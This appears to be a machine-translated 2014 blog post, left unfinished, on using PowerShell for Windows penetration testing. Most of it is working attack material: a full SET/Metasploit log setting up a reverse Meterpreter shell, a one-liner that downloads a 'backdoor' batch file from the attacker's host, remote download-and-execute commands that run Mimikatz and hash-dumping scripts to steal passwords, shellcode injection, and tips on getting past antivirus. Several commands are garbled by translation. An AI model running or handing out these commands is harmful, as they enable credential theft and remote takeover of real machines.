DM_ 2014/10/27 10:32
0 x00 Powershell profile
Powershell is like bash under Linux, and Powershell is available on Windows. NET Framework powerful functions, also can call Windows API, in Win7 / Server 2008, Powershell has been integrated in the system. Powershell’s powerful features bring great convenience to Windows management and penetration testing.
0x01 PowerShell Execution Policy
Powershell scripts cannot be double-clicked or executed under CMD by default. There are ways to circumvent this policy at execution time. The easiest way to do this is to run powershell.exe to attach the command you want to execute, or you can copy the script you want to execute directly into the Powershell window. Download and execute is also possible, as in the following example.
You can also do this if you need to execute a PS1 file:
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
Copy the codeYou are not advised to use other methods to change the execution policy globally. You can select an execution mode based on the following instructions in different scenarios.
0x02 Reverse the Shell
When encountering protective software, you can use Powershell to execute shellcode to return the shell. The execution script can be generated using MSF or the set toolkit. Note that MSF generates ps1 files while set generates bat files. Here is the process generated in a set:
Select from the menu: 1) Social-Engineering Attacks 2) Fast-Track Penetration Testing 3) Third Party Modules 4) Update the Metasploit Framework 5) Update the Social-Engineer Toolkit 6) Update SET configuration 7) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set> 1 .. SNIP... Select from the menu: 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) SMS Spoofing Attack Vector 8) Wireless Access Point Attack Vector 9) QRCode Generator Attack Vector 10) Powershell Attack Vectors 11) Third Party Modules 99) Return back to the main menu. set> 10 The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies. 1) Powershell Alphanumeric Shellcode Injector 2) Powershell Reverse Shell 3) Powershell Bind Shell 4) Powershell Dump SAM Database 99) Return to Main Menu set:powershell>1 set> IP address for the payload listener: 192.168.200.159 Set :powershell> Enter the port for the reverse [443]:4444 [*] Prepping the payload for delivery and injecting alphanumeric shellcode... [*] Generating x86-based powershell injection code... [*] Finished generating powershell injection bypass. [*] Encoded to bypass execution restriction policy... [*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/ set> Do you want to start the listener now [yes/no]: : yes .. SNIP... [*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives. resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (/root/.set/reports/powershell/powershell.rc)> set lport 4444 lport => 4444 resource (/ root/set/reports/powershell/powershell. Rc) > set LHOST 0.0.0.0 LHOST = > 0.0.0.0 resource (/root/.set/reports/powershell/powershell.rc)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 0.0.0.00:4444 [*] Starting the payload Handler... [*] Sending stage (769024 bytes) to 192.168.200.158 [*] Meterpreter session 1 Opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800 MSF exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 WIN-M49V8M0CSH2\server @ Win-m49v8m0csh2 192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)Copy the codeThe generated files in the/root /. Set/reports/powershell/under. TXT is a bat file. You can rename it and run it directly. Here’s a trick: Download files directly from Powershell in one sentence.
Powershell (new - object System.Net.WebClient). DownloadFile (' http://192.168.200.159/backdoor ', 'backdoor. Bat)Copy the code
Then execute to get the Meterpreter session.
In addition, you can run CMD and hash plaintext dump.
0x03 Dump the hash
Of course, if you just need to dump the hash, you can do it with Powershell.
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1'); Get-PassHashesCopy the code
0x04 Dump the plain Password
It is also possible to obtain plaintext by executing powerShell version Mimikatz as follows.
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-M imikatz.ps1'); Invoke - Mimikatz - DumpCertsCopy the code
Note that the Mimikatz Command can also be executed here with the Command parameter.
0x05 Memory Dumping
Powershell can also do things like Procdump to get the dumps for a process. Here is a demonstration of getting the dumps from lsass.exe and then Mimikatz from dumps in plaintext.
The lsass DUMPS file is then downloaded back and analyzed with Mimikatz to get the plaintext password.
Of course, memory Dumps does more than get Windows passwords. It is possible that other important information or data may be stored in process memory. Reference blog.spiderlabs.com/2012/07/pen… .
0x06 Execute the shellcode
Powershell can also execute ShellCode because its rich extension functions make it very convenient to call Windows APIS. The process is as follows:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke- Shellcode.ps1'); Invoke - Shellcode - helpCopy the code
However, there is a problem here, that is, there are few shellcodes in X64, and shellcodes collected online are x86. An error occurs if you execute x86 shellcode directly.
By default, the invokeshellcode. ps1 script injects Shellcode into the powershell.exe process. Then the x86 Shellcode can be executed using the 32-bit Powershell. exe in the 64-bit system environment as follows:
C: \ Windows \ syswow64 \ WindowsPowerShell \ v1.0 \ powershell exe IEX (New - Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke- Shellcode.ps1'); Invoke - Shellcode - Shellcode 0 x90, 0 x90, 0 x90...Copy the code
This process applies to most shellcodes generated by MSFPayload. Of course, other methods can be used to execute ShellCode under Windows, such as ShellCode Exec. However, this method does not bypass AV. But you can bypass according to the source code.
To be continued.